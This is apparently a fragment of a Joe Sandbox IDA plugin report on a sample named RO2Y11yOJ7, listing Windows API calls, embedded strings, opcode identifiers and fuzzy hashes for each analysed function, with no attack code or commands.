                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: d6850c672ebd1a41979b0b75c414573bed0d2655ae169ba1f96ef68b893d8274
                                                          • Instruction ID: 863572839177f8dda2140e4f50ef7ba43ece9b095dac022f4a1d17ced49d7bae
                                                          • Opcode Fuzzy Hash: d6850c672ebd1a41979b0b75c414573bed0d2655ae169ba1f96ef68b893d8274
                                                          • Instruction Fuzzy Hash: 78215C3294421EAFCF27AF90CC56EEE7779BF18300F044465F515AA0A2DB71AA68DB50
                                                          APIs
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                            • Part of subcall function 00347A84: _memmove.LIBCMT ref: 00347B0D
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003A53D7
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003A53ED
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003A53FE
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003A5410
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003A5421
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 401c17304c0ebf08e7287bc86cd966f0d3177b12d5a4ee87b666c1e2b56fd5e7
                                                          • Instruction ID: 4509c62ae82cb0a238d5bea67dde5d569b5b6e13561f28321ca9414c468e3828
                                                          • Opcode Fuzzy Hash: 401c17304c0ebf08e7287bc86cd966f0d3177b12d5a4ee87b666c1e2b56fd5e7
                                                          • Instruction Fuzzy Hash: 7411942195016D79D726B762DC4ADFF7BBCEF96B40F000429F501AA0D1DF602D45C9A0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 09684fc5736848c19e08e46a12e55b0d772937bb2f292d753bfe2d54f5d21c5a
                                                          • Instruction ID: bd77382f97c3c9e84b001ace10b1ff0ffed9895c70584a55bbbe1d783dfb2f8a
                                                          • Opcode Fuzzy Hash: 09684fc5736848c19e08e46a12e55b0d772937bb2f292d753bfe2d54f5d21c5a
                                                          • Instruction Fuzzy Hash: 8011E431904114AFCB27A720EC4AEEB77BDDF43711F0581B6F415EA091EFB29A818791
                                                          APIs
                                                          • timeGetTime.WINMM ref: 003A5021
                                                            • Part of subcall function 0036034A: timeGetTime.WINMM(?,7707B400,00350FDB), ref: 0036034E
                                                          • Sleep.KERNEL32(0000000A), ref: 003A504D
                                                          • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 003A5071
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003A5093
                                                          • SetActiveWindow.USER32 ref: 003A50B2
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003A50C0
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003A50DF
                                                          • Sleep.KERNEL32(000000FA), ref: 003A50EA
                                                          • IsWindow.USER32 ref: 003A50F6
                                                          • EndDialog.USER32(00000000), ref: 003A5107
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: b2f27416e470a1dca7688e140a1ee74140cd8a586e732343f6816a27b0cd0f50
                                                          • Instruction ID: 2943e899396b807defaf50508587cfeaa95c8455e2ad2d003c3c628907d53a62
                                                          • Opcode Fuzzy Hash: b2f27416e470a1dca7688e140a1ee74140cd8a586e732343f6816a27b0cd0f50
                                                          • Instruction Fuzzy Hash: BB214C71200604BFEB039F20ED89F263AAEEB96389F061038F506D52B1DA719D609B65
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • CoInitialize.OLE32(00000000), ref: 003AD676
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003AD709
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 003AD71D
                                                          • CoCreateInstance.OLE32(003D2D7C,00000000,00000001,003F8C1C,?), ref: 003AD769
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003AD7D8
                                                          • CoTaskMemFree.OLE32(?,?), ref: 003AD830
                                                          • _memset.LIBCMT ref: 003AD86D
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 003AD8A9
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003AD8CC
                                                          • CoTaskMemFree.OLE32(00000000), ref: 003AD8D3
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003AD90A
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 003AD90C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: bff9120619cccdb6f0c094f7a547deaa10bca52585a4eb8ac5ccf719ddea557b
                                                          • Instruction ID: 33ef7d045b26d5b3e8c476b3abc9a2028bc5c405043079600075c017c16880d3
                                                          • Opcode Fuzzy Hash: bff9120619cccdb6f0c094f7a547deaa10bca52585a4eb8ac5ccf719ddea557b
                                                          • Instruction Fuzzy Hash: 0EB1ED75A00109AFDB05DFA4C885EAEBBF9FF49304B148469F90ADB261DB30ED45CB50
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 003A03C8
                                                          • SetKeyboardState.USER32(?), ref: 003A0433
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003A0453
                                                          • GetKeyState.USER32(000000A0), ref: 003A046A
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003A0499
                                                          • GetKeyState.USER32(000000A1), ref: 003A04AA
                                                          • GetAsyncKeyState.USER32(00000011), ref: 003A04D6
                                                          • GetKeyState.USER32(00000011), ref: 003A04E4
                                                          • GetAsyncKeyState.USER32(00000012), ref: 003A050D
                                                          • GetKeyState.USER32(00000012), ref: 003A051B
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003A0544
                                                          • GetKeyState.USER32(0000005B), ref: 003A0552
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                                          • Instruction ID: cdeed0ca658b0665f17f1bc2c44645b0f0d5f8b3addc9d2245b98d14bcca77e0
                                                          • Opcode Fuzzy Hash: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                                          • Instruction Fuzzy Hash: A251BB24D087842AFB3ADBB188157EEBFB4DF13380F49859D95C25A1C3DA649B4CCB61
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 0039C545
                                                          • GetWindowRect.USER32(00000000,?), ref: 0039C557
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0039C5B5
                                                          • GetDlgItem.USER32(?,00000002), ref: 0039C5C0
                                                          • GetWindowRect.USER32(00000000,?), ref: 0039C5D2
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0039C626
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0039C634
                                                          • GetWindowRect.USER32(00000000,?), ref: 0039C645
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0039C688
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0039C696
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0039C6B3
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0039C6C0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                                          • Instruction ID: b53d597d8c5db4f6ea571bb49afc2ced43982fa6702ee2133edee1f6ee4b915d
                                                          • Opcode Fuzzy Hash: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                                          • Instruction Fuzzy Hash: B7512F71B10205AFDF19CFA9DD89EAEBBBAEB88311F15812DF515D7290D770AD008B50
                                                          APIs
                                                            • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003420D3
                                                          • KillTimer.USER32(-00000001,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0034216E
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0037BE26
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BE57
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BE6E
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BE8A
                                                          • DeleteObject.GDI32(00000000), ref: 0037BE9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: d5447f9834d721ddf5766d932d74b06eface4231e6231fb9df5879689510117d
                                                          • Instruction ID: b96872554a27527a5117a2c67041371756e5a24b27cae946bfef10dbeb4869c2
                                                          • Opcode Fuzzy Hash: d5447f9834d721ddf5766d932d74b06eface4231e6231fb9df5879689510117d
                                                          • Instruction Fuzzy Hash: F1617932100A10DFDB37AF14DA48B2BB7F6FB40312F918529E546ABA60C774B890DF95
                                                          APIs
                                                            • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                          • GetSysColor.USER32(0000000F), ref: 003421D3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: de1cdd8cf6fbc0bb35e40b2dde455d30f58e957114c9c2f120c9e8112d24c41b
                                                          • Instruction ID: b4c7935facfe4af4e0dfc161870fb148f7b9c1d2acf379fc92b66b62345bcb74
                                                          • Opcode Fuzzy Hash: de1cdd8cf6fbc0bb35e40b2dde455d30f58e957114c9c2f120c9e8112d24c41b
                                                          • Instruction Fuzzy Hash: 2C41D331000514DFDB235F28EC48BBA3BAAEB06331F598265FD65AE1E1C771AC41DB61
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,003CF910), ref: 003AA995
                                                          • GetDriveTypeW.KERNEL32(00000061,003F89A0,00000061), ref: 003AAA5F
                                                          • _wcscpy.LIBCMT ref: 003AAA89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: 3b5ec9931a9cbaf378185fe8b6e984b9e0a0b5709000d3f3e517e827b5103bbd
                                                          • Instruction ID: d1c1660a905fc6c0594a4e5322ac28e6697ae650230badb04025efd13cb16bfc
                                                          • Opcode Fuzzy Hash: 3b5ec9931a9cbaf378185fe8b6e984b9e0a0b5709000d3f3e517e827b5103bbd
                                                          • Instruction Fuzzy Hash: 3351AD321187019FC716EF14C892AAFB7E9EF81300F10492DF5969F2A2DB31A909CB53
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: 66713cffe6d7c3082c16ed6853a74138621df82fc2cb80312a39d0d9e97c63ec
                                                          • Instruction ID: 1fd0b1a2e823c436ea7159f778d48d45f69a29e36f11531ce35c78e5a4b249b7
                                                          • Opcode Fuzzy Hash: 66713cffe6d7c3082c16ed6853a74138621df82fc2cb80312a39d0d9e97c63ec
                                                          • Instruction Fuzzy Hash: 4F41C231514209AFDB3A9B34D842F7B77E8FF45310F20846EE549DF296EB31A9418B51
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C719C
                                                          • CreateMenu.USER32 ref: 003C71B7
                                                          • SetMenu.USER32(?,00000000), ref: 003C71C6
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7253
                                                          • IsMenu.USER32(?), ref: 003C7269
                                                          • CreatePopupMenu.USER32 ref: 003C7273
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C72A0
                                                          • DrawMenuBar.USER32 ref: 003C72A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: 50983a2291c7e35544f26fb3ec67cab08495a2e12d17155e4a81ade3d1246028
                                                          • Instruction ID: ba7959b3b4aededd436cf4ee9b77cf0b7d318e9e9f734cfce3a2baa649f3564f
                                                          • Opcode Fuzzy Hash: 50983a2291c7e35544f26fb3ec67cab08495a2e12d17155e4a81ade3d1246028
                                                          • Instruction Fuzzy Hash: 91411275A01209AFDB12DF65D888F9A7BB9FB49300F154529FD0AA7360DB31AD10CFA0
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003C7590
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 003C7597
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003C75AA
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003C75B2
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 003C75BD
                                                          • DeleteDC.GDI32(00000000), ref: 003C75C6
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 003C75D0
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003C75E4
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003C75F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 9ee6816f3abf841897eda4855e8c3a5d377cfe59245c2cdaa1c568c3758155bb
                                                          • Instruction ID: 8f1f5dc70d5af9605ff96184ce2780a82422c5e820bde8dd123f36b11bd7b8f9
                                                          • Opcode Fuzzy Hash: 9ee6816f3abf841897eda4855e8c3a5d377cfe59245c2cdaa1c568c3758155bb
                                                          • Instruction Fuzzy Hash: D8314772104219AFDB129F65DC09FEA3B6EEF0A760F110228FA15E61A0C735E821DB64
                                                          APIs
                                                          • _memset.LIBCMT ref: 00366FBB
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          • __gmtime64_s.LIBCMT ref: 00367054
                                                          • __gmtime64_s.LIBCMT ref: 0036708A
                                                          • __gmtime64_s.LIBCMT ref: 003670A7
                                                          • __allrem.LIBCMT ref: 003670FD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00367119
                                                          • __allrem.LIBCMT ref: 00367130
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036714E
                                                          • __allrem.LIBCMT ref: 00367165
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00367183
                                                          • __invoke_watson.LIBCMT ref: 003671F4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction ID: 8c4c12e6a381337a9a6a02d3e8dd669a83124bfaaab631ae1950cc826e23815d
                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction Fuzzy Hash: E7713B71A00717ABE7269F38CC42B5AB3A8AF05364F11C23AF414DF685E774E9408BD0
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A283A
                                                          • GetMenuItemInfoW.USER32(00405890,000000FF,00000000,00000030), ref: 003A289B
                                                          • SetMenuItemInfoW.USER32(00405890,00000004,00000000,00000030), ref: 003A28D1
                                                          • Sleep.KERNEL32(000001F4), ref: 003A28E3
                                                          • GetMenuItemCount.USER32(?), ref: 003A2927
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003A2943
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 003A296D
                                                          • GetMenuItemID.USER32(?,?), ref: 003A29B2
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003A29F8
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2A0C
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2A2D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
